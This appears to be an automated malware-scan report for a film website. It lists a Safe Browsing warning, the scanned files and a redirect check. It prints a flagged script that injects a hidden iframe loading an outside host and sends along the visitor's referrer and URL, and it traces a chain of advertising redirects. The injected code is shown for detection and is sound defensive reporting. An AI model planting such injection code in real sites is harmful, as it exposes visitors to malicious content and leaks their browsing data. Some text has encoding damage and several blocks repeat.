Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gofilm.webcindario.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gofilm.webcindario.com/ | 200 OK Content-Length: 6605 Content-Type: text/html | clean |
http://gofilm.webcindario.com/lock.js | 200 OK Content-Length: 1854 Content-Type: application/x-javascript | clean |
http://gofilm.webcindario.com/script.js | 200 OK Content-Length: 300 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="100%" height="4000" frameborder="0" framespacing="0" scrolling="no" src="http://bezsvyazi.ru/in.cgi?19&seoref='+encodeURIComponent(document.referrer)+'¶meter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=ñìîòðåòü ôèëüì">'); Antivirus reports:
| ||
http://probnic.info/zapaseng/popuptraf_new.js | HTTP/1.1 302 Found Connection: close Date: Mon, 29 Sep 2014 04:52:54 GMT Location: http://r.meendocash.com/lr.php?rid=42c00128b0d12b6b Server: Apache/2.2.15 (CentOS) Content-Length: 313 Content-Type: text/html; charset=iso-8859-1 | clean |
http://r.meendocash.com/lr.php?rid=42c00128b0d12b6b | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 29 Sep 2014 04:52:32 GMT Location: http://landing.meendo.com/badmarriage3/index.en_us.181.php?t=1411966352.4221&th=b2c4bb7567&rid=42c00128b0d12b6b&partner=1243&sub_id=4 Server: nginx/1.2.4 Content-Type: text/html X-Powered-By: PHP/5.3.17 | clean |
http://landing.meendo.com/badmarriage3/index.en_us.181.php?t=1411966352.4221&th=b2c4bb7567&rid=42c00128b0d12b6b&partner=1243&sub_id=4 | 200 OK Content-Length: 7731 Content-Type: text/html | clean |
http://landing.meendo.com/badmarriage3/ | 200 OK Content-Length: 8325 Content-Type: text/html | clean |
http://landing.meendo.com/test404page.js | 404 Not Found Content-Length: 570 Content-Type: text/html | clean |
http://hosting.miarroba.info/?__muid=5369c2a4b26581867646f4d253c5cde105bc7513&h=1481538&t=1411966350&k=8c7c452175ac2252d14450a21bda415f | 200 OK Content-Length: 90 Content-Type: application/x-javascript | clean |
http://contadores.miarroba.es/ver.php?id=324766 | 200 OK Content-Length: 11129 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gofilm.webcindario.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Sep 2014 04:52:30 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: __muid=5369c2a4b26581867646f4d253c5cde105bc7513; Domain=.webcindario.com; Path=/; Expires=Tue, 19 Jan 2038 03:14:11 GMT; HttpOnly
X-Powered-By: Webcindario Hosting Service
GET / HTTP/1.1
Host: gofilm.webcindario.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Sep 2014 04:52:30 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: __muid=5369c2a4b26581867646f4d253c5cde105bc7513; Domain=.webcindario.com; Path=/; Expires=Tue, 19 Jan 2038 03:14:11 GMT; HttpOnly
X-Powered-By: Webcindario Hosting Service
Second query (visit from search engine):
GET / HTTP/1.1
Host: gofilm.webcindario.com
Referer: http://www.google.com/search?q=gofilm.webcindario.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gofilm.webcindario.com
Referer: http://www.google.com/search?q=gofilm.webcindario.com
Result:
The result is similar to the first query. There are no suspicious redirects found.